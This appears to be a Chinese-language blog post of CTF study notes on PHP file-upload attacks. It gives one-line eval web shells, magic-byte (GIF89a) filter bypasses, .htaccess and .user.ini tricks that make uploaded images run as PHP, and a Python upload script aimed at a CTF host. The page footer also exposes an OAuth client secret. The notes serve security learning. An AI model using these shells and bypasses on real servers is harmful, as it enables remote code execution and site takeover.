<!DOCTYPE HTML>
<html>
<head >
  <meta charset="utf-8">
  
  <title>文件上传 | Hexo</title>

  
  <meta name="author" content="John Doe">
  

  
  <meta name="description" content="正常的一句话木马12345&amp;lt;?php @eval($_REQUEST[&amp;#x27;cmd&amp;#x27;]);?&amp;gt;   //开始上传图片中写入的一句话木马&amp;lt;script language=&amp;quot;php&amp;quot;&amp;gt;eval($_REQUEST[&amp;#x27;cmd&amp;#x27;">
  

  
  
  <meta name="keywords" content="">
  

  <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">

  <meta property="og:title" content="文件上传"/>

  <meta property="og:site_name" content="Hexo"/>

  
  <meta property="og:image" content="/favicon.ico"/>
  
  
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-5005349780815724",
    enable_page_level_ads: true
  });
</script>

  
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?223eea22355699157e147870eb124b24";
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
})();
</script>


  <link rel="manifest" href="/manifest.json">
  <link href="/favicon.ico" rel="icon">

  <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  <link href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
  <link rel="stylesheet" href="/css/base/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">


<meta name="generator" content="Hexo 7.2.0"></head>


<body>
<div class="blog">
  <div class="content">

    

    <header class="header-container" style="background-image: url('/images/blog-bg.jpg');">


<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
    <div class="container-fluid">
        <div class="navbar-header page-scroll">
          <button type="button" id="tglBtn" class="navbar-toggle">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="/">John Doe</a>
        </div>
        <div id="bosenyblog-navbar">
          <div class="navbar-collapse" id="bs-example-navbar-collapse-6">
            <ul class="nav navbar-nav navbar-right">
            
              <li><a href="/">Home</a></li>
            
              <li><a href="/archives">Archives</a></li>
            
              <li><a href="/about">About</a></li>
            
              <li><a href="/tags">Tags</a></li>
            
            </ul>
          </div>
        </div>

    </div>
 </nav>
 <div class="gotop-btn">

 </div>
</header>

        
          <div class="container ">
          <div class="row">
            <main class="site-main posts-loop col-lg-8 col-lg-offset-2
                col-md-10 col-md-offset-1
                post-container" style="position: inherit;">
            <article class="article-container ">

  
    
    <h3 class="article-title"><span>文件上传</span></h3>
    
  

  <div class="article-top-meta">
    <span class="posted-on">
      <a href="/2024/08/26/文件上传/" rel="bookmark">
        <time class="entry-date published" datetime="2024-08-26T02:21:02.000Z">
          2024-08-26
        </time>
      </a>
    </span>
    <br />
    
    <span id="busuanzi_container_page_pv">
      本文总阅读量<span id="busuanzi_value_page_pv"></span>次
    </span>
    
  </div>


  

  <div class="article-content">
    <div class="entry">
      
          <h2 id="正常的一句话木马"><a href="#正常的一句话木马" class="headerlink" title="正常的一句话木马"></a>正常的一句话木马</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_REQUEST[&#x27;cmd&#x27;]);?&gt;   //开始上传图片中写入的一句话木马</span><br><span class="line"></span><br><span class="line">&lt;script language=&quot;php&quot;&gt;eval($_REQUEST[&#x27;cmd&#x27;]);&lt;/script&gt;     //    用于绕过 &lt;?</span><br><span class="line"></span><br><span class="line">还可以在前面加 幻术头绕过   GIF89a（GIF图片的ascii 值）</span><br></pre></td></tr></table></figure>
<hr>
<h3 id="若使用exif-imagetype-函数-对上传文件后缀进行了限制。"><a href="#若使用exif-imagetype-函数-对上传文件后缀进行了限制。" class="headerlink" title="若使用exif_imagetype() 函数 对上传文件后缀进行了限制。"></a>若使用exif_imagetype() 函数 对上传文件后缀进行了限制。</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line">&lt;script language=&#x27;php&#x27;&gt;eval($_REQUEST[&#x27;cmd&#x27;]);&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">//三种图片的前缀</span><br><span class="line">JPG ：FF D8 FF E0 00 10 4A 46 49 46（16进制编码）</span><br><span class="line">GIF：47 49 46 38 39 61（ascll值是GIF89a）</span><br><span class="line">PNG： 89 50 4E 47</span><br></pre></td></tr></table></figure>
<hr>
<h3 id="user-ini-文件"><a href="#user-ini-文件" class="headerlink" title=".user.ini 文件"></a>.user.ini 文件</h3><p style='font-size:12x;text-indent:2em'>到现在我们就可以上传成功一个图片了，但它一句话木马并不能被作为PHP文件解析，那么怎么样去绕过？？？
在学习文件上传时应该都学过， .htaccess 文件，可以把后缀为其他类型的图片解析成php文件对，使我们上传的图片内容可以被解析，但是这里对 .htaccess文件也做了限制，所以我们就需要想其他的办法。</p>

<h4 id="一般的-htaccess文件"><a href="#一般的-htaccess文件" class="headerlink" title="一般的.htaccess文件"></a>一般的.htaccess文件</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch&gt;</span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br><span class="line"></span><br><span class="line">AddType application/x-httpd-php .zm</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">import base64</span><br><span class="line">import requests</span><br><span class="line">htaccess=&quot;&quot;&quot;</span><br><span class="line">#define width 666</span><br><span class="line">#define height 666</span><br><span class="line">AddType application/x-httpd-php .ahhh</span><br><span class="line">php_value auto_append_file &quot;php://filter/convert.base64-decode/resource=./shell.ahhh&quot;</span><br><span class="line">&quot;&quot;&quot;</span><br><span class="line">shell=b&quot;GIF89a12&quot;+base64.b64encode(b&quot;&lt;?php eval($_REQUEST[&#x27;cmd&#x27;]);?&gt;&quot;)</span><br><span class="line">url=&quot;http://c7352155-c63d-4323-9d91-b38477e4f41f.node5.buuoj.cn:81/?_=$&#123;%f8%f8%f8%f8^%a7%bf%bd%ac&#125;&#123;%f8&#125;();&amp;%f8=get_the_flag&quot;</span><br><span class="line">files=&#123;&#x27;file&#x27;:(&#x27;.htaccess&#x27;,htaccess,&#x27;image/jpeg&#x27;)&#125;</span><br><span class="line">data=&#123;&quot;upload&quot;:&quot;Submit&quot;&#125;</span><br><span class="line">response=requests.post(url=url,data=data,files=files)</span><br><span class="line">print(response.text)</span><br><span class="line">files=&#123;&#x27;file&#x27;:(&#x27;shell.ahhh&#x27;,shell,&#x27;image/jpeg&#x27;)&#125;</span><br><span class="line">response=requests.post(url=url,data=data,files=files)</span><br><span class="line">print(response.text)</span><br></pre></td></tr></table></figure>
<h5 id="这里我们引入一个php目录配置文件-user-ini"><a href="#这里我们引入一个php目录配置文件-user-ini" class="headerlink" title="这里我们引入一个php目录配置文件 .user.ini"></a>这里我们引入一个php目录配置文件 .user.ini</h5><p>作用：这里如果我们上传一个.user.ini 文件，那么当我们访问目录中的任何php文件时，都会调用.user.ini中指定的文件以php的形式进行读取我<br>们在user.ini设置文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">//上传.user.ini文件，条件如下：</span><br><span class="line"></span><br><span class="line">(1)服务器脚本语言为PHP                     </span><br><span class="line">(2)对应目录下面有可执行的php文件              //index.php</span><br><span class="line">(3)服务器使用CGI／FastCGI模式   </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">上传的文件内容</span><br><span class="line">GIF89a                         //auto_prepend_file是在文件前插入，而auto_append_file是在文件最后才插入。                  </span><br><span class="line">auto_prepend_file=b.gif       //需要注意上穿的文件名字要和设定的名字一样，这里可以设定多个</span><br></pre></td></tr></table></figure>
<p>上传了 $.user.ini$ 文件之后，执行 $.user.ini$ 文件目录下的任意PHP文件，那么他就会执行我们在 $.user.ini$ 文件中制定的那个任意文件，且作为PHP文件执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">举个例子理解user.ini作用：</span><br><span class="line">/*这是.user.ini的两个配置  </span><br><span class="line">auto_prepend_file是在文件前插入</span><br><span class="line">auto_append_file是在文件最后才插入*/</span><br><span class="line"></span><br><span class="line">1.在user.ini 中设置</span><br><span class="line">auto_prepend_file=b.gif</span><br><span class="line"></span><br><span class="line">2.在b.gif中设置 一句话木马</span><br><span class="line"></span><br><span class="line">3.还有个php文件 如：前面做题中的index.php    </span><br><span class="line"></span><br><span class="line">如果这三个条件在同一个目录下面，就会出先问题，这里就相当于 在index.php中写</span><br><span class="line">了include &quot;b.gif&quot; , 可以进行文件包含，导致的后果是：当我们对目录中的index.</span><br><span class="line">php进行访问的时候，会调用.usre.ini 中的文件把b.gif文件以php的形式进行取造</span><br><span class="line">成.user.ini的漏洞</span><br></pre></td></tr></table></figure>
      
    </div>
    
  </div>

  <div class="article-footer">
    <div class="article-meta pull-left">

    

    

    </div>

    
  </div>
  
    
    
  
</article>
   
    <div id="toc" class="toc-article ">
    <div class="toc-title">目录</div>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A3%E5%B8%B8%E7%9A%84%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.</span> <span class="toc-text">正常的一句话木马</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8B%A5%E4%BD%BF%E7%94%A8exif-imagetype-%E5%87%BD%E6%95%B0-%E5%AF%B9%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6%E5%90%8E%E7%BC%80%E8%BF%9B%E8%A1%8C%E4%BA%86%E9%99%90%E5%88%B6%E3%80%82"><span class="toc-number">1.1.</span> <span class="toc-text">若使用exif_imagetype() 函数 对上传文件后缀进行了限制。</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#user-ini-%E6%96%87%E4%BB%B6"><span class="toc-number">1.2.</span> <span class="toc-text">.user.ini 文件</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%80%E8%88%AC%E7%9A%84-htaccess%E6%96%87%E4%BB%B6"><span class="toc-number">1.2.1.</span> <span class="toc-text">一般的.htaccess文件</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%BF%99%E9%87%8C%E6%88%91%E4%BB%AC%E5%BC%95%E5%85%A5%E4%B8%80%E4%B8%AAphp%E7%9B%AE%E5%BD%95%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6-user-ini"><span class="toc-number">1.2.1.1.</span> <span class="toc-text">这里我们引入一个php目录配置文件 .user.ini</span></a></li></ol></li></ol></li></ol></li></ol>
</div>


  

	<!-- async load  -->
	<script>
			function async(u, c) {
				var d = document, t = 'script',
						o = d.createElement(t),
						s = d.getElementsByTagName(t)[0];
				o.src = u;
				if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
				s.parentNode.insertBefore(o, s);
			}
	</script>
	<!-- anchor-js, Doc:http://bryanbraun.github.io/anchorjs/ -->
	<script>
			async("https://cdn.bootcss.com/anchor-js/1.1.1/anchor.min.js",function(){
					anchors.options = {
						visible: 'hover',
						placement: 'left',
						// icon: '#'
					};
					anchors.add().remove('.article-title').remove('.subheading').remove('.sidebar-container h5');
			})
	</script>
	<style>
			/* place left on bigger screen */
			@media all and (min-width: 800px) {
					.anchorjs-link{
							position: absolute;
							left: -0.75em;
							font-size: 1.1em;
							margin-top : -0.1em;
					}
			}
	</style>




<!-- UY BEGIN -->
	<div id="gitment-container"></div>
	<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
	<script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>
	<script src="/js/web-pinyin.js"></script>
	<script>
		function toUnicode(s){ 
			return s.replace(/([\u4E00-\u9FA5]|[\uFE30-\uFFA0])/g,function(){
			return "\\u" + RegExp["$1"].charCodeAt(0).toString(16);
			});
		}
		var title = '文件上传'
		var GitHub_id = 'Boseny'
		var client_id = 'f40c67d0359a2646d2b1'
		var client_secret = '1cbedbd1a1a2e4b42901aee3d7afe1856c1b7e2d'
		var repo = 'boseny.me'
		var gitment = new Gitment({
		// id: '页面 ID', // 可选。默认为 location.href
		// id:"11" ,
		id: title,
		title: title,
		owner: GitHub_id,//'你的 GitHub ID',
		repo: repo,//'存储评论的 repo',
		oauth: {
			client_id: client_id,//'你的 client ID',
			client_secret: client_secret,//'你的 client secret',
		},
		})
		gitment.render('gitment-container')
	</script>
<!-- UY END -->




            </main>
          </div>
        </div>
       
    <footer class="site-footer">
  <p class="site-info">
    Proudly powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and
    Theme by <a href="https://github.com/BosenY/Lap" target="_blank">Lap</a>
    <br/><span id="busuanzi_container_site_uv"> 
  本站访客数<span id="busuanzi_value_site_uv"></span>人次
</span>
    </br>
    
      
        &copy; 2025 John Doe
      
    
  </p>
</footer>
    
<script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
                (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
            m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

    ga('create', 'UA-92842840-1', 'auto');
    ga('send', 'pageview');

</script>


  </div>

</div>
<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<script src="https://cdn.bootcss.com/vue/2.5.13/vue.min.js"></script>
<script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
<script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>

  <script src="https://unpkg.com/draw-something/dist/draw.min.js"></script>
  <script>
    let maxNum = Number.parseInt('10')
    let iconText = '❤'
    let color = 'red'
    new Draw({maxNum, iconText, color})
  </script>

<script src="/js/index.js"></script>
<script src="/js/search.js"></script>

</body>
</html>